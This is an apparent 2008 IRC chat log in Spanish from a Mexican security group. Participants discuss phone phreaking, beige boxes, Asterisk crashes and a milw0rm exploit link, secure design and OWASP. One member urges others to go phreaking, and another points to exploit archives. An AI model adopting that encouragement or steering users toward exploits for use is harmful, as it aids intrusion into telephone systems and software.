(08:11:01) nitr0us1: con un pic controlado con una máquina
(08:11:09) nitr0us1: los emuladores de telmex usaban PIC
(08:11:25) nitr0us1: busken un video de mmmm 2600 - The Last Hope ..
(08:11:38) nitr0us1: se llama algo como COOL STUFF WITH MICROCONTROLLERS
(08:11:39) nitr0us1: algo así
(08:11:42) jimtron: sip pero kiero basarme para entender bien el funcionamiento
(08:11:47) jimtron: ya k no tengo un logger
(08:11:55) nitr0us1: jimtron: pero es molesto q estés poniendo eso en publico
(08:11:59) nitr0us1: ponte a investigar
(08:12:03) nitr0us1: no solo estés chingando
(08:12:14) nitr0us1: jimtron: entonces, ponte a investigar con la scene wey
(08:12:17) jimtron: ya investigue
(08:12:17) nitr0us1: ya t dije quienes
(08:12:35) nitr0us1: jimtron: pues entonces hazlo tu wey ! :S .... carga tu infraestructura
(08:12:41) nitr0us1: o quieres q t mande a LADY ADA para q t ayude?
(08:12:52) jimtron: ajajaj
(08:13:31) nitr0us1: http://www.ladyada.net/
(08:13:57) nitr0us1: lo q hace es PHREACKING real !!
(08:14:45) nitr0us1: bueno, los invito a leer un artículo de security focus
(08:14:48) nitr0us1: donde te explican
(08:14:57) nitr0us1: el SKILL SET q debes tener para ser l33t XD casi casi jajaja
(08:15:04) nitr0us1: como security professional
(08:15:09) vircob: http://www.citizenengineer.com/
(08:15:15) nitr0us1: si, ese sitio rula
(08:15:24) nitr0us1: citizen engineer , ahi es donde verán a lady ada en acción
(08:15:32) nitr0us1: pwn3ando unas cajas telefónicas
(08:15:35) ***Roa le enviara esta url a su jefe http://www.ingenierosoftware.com/analisisydiseno/podredumbre.php
(08:15:37) Roa: xDD
(08:15:49) nitr0us1: qiuenes tengan chance, hagan phreaking
(08:15:54) nitr0us1: yo hace unos meses lo hacía
(08:16:00) nitr0us1: todavía tengo mi Beige Box
(08:16:07) nitr0us1: funcional
(08:16:32) nitr0us1: todavía uso windows 98.. y que http://mx.youtube.com/watch?v=mV_lHJ3XC-c
(08:16:33) nitr0us1: jajaja XD
(08:17:13) KBrown:-- Asterisk tiene un chingo de pedos de diseño.
(08:17:22) KBrown:-- El código si lo lees se ve correcto.
(08:17:40) nitr0us1: KBrown: si we, en milw0rm hay muchos PoCs
(08:17:57) nitr0us1: es q es un gran pedote
(08:17:58) KBrown:-- hasta que lo corres y haces una combinación especial de operaciones donde logras que un thread le sobreescriba
-------------------------- las estructuras a otro thread.
(08:18:00) nitr0us1: el pinche diseño de software
(08:18:05) nitr0us1: por eso lo weyes de Microsoft
(08:18:13) nitr0us1: cambiaron de metedología
(08:18:19) nitr0us1: no recuerdo como se llama, pero impolica
(08:18:30) nitr0us1: implica aplicar seguridad al soft. desde la etapa de DISEÑO
(08:18:57) KBrown: Todavía el martes me encontré un nuevo crasheador del Asterisk.
(08:19:04) KBrown: Y reproducible.
(08:19:56) nitr0us1: solo pongan asterisk en milw0rm.com
(08:19:57) nitr0us1: http://www.milw0rm.com/exploits/5749
(08:20:28) nitr0us1: y es q la neta, está cabrón hacer código SEGURO
(08:20:39) nitr0us1: hay guidelines de OWASP ... y de lo q quieran
(08:20:49) nitr0us1: pero está cabrón cuando el proyecto es complejo
(08:24:05) nitr0us1: hay gente muy chingona en méxico q para mi, es el verdadero underground
(08:24:08) nitr0us1: son esas personas
(08:24:16) nitr0us1: q no saben lo q es el UNDERGROUND
(08:24:19) nitr0us1: son gente q trabaja
(08:24:23) nitr0us1: y son muy chingonas
(08:24:39) nitr0us1: en la audit q hice esta semana.. el DBA, un señor como de 42 años
(08:24:41) nitr0us1: no mmaesssssss
(08:24:45) nitr0us1: hijo d la chingadaaaa :O
(08:25:05) nitr0us1: ese wey, es una riata o REATAAAA XD jajaj en Oracle... UNIX.. bla bla. pero lo hace por trabajo
(08:25:18) nitr0us1: ese wey d seguro no sabe q existe algo llamado UNDERGROUND
(08:25:25) nitr0us1: hay gente muy chingona
(08:25:37) nitr0us1: los militares tienen stuff muy cabrón también, operado por gente muy chingona
(08:25:46) nitr0us1: la gente del CISEN (como la CIA, pero versión mexicana)
(08:25:55) nitr0us1: contrata inteligencia !
(08:27:43) nitr0us1: bueno de entremessssss... un video.. nitr0us1 vs crypkey
-------------------------- http://mx.youtube.com/watch?v=jtIuh38JmcI&feature=channel_page
(08:54:38) crypkey: nitr0us1, tmb Myth Busters.. hacen buen research.

Road Technology Minds Security Group - 2008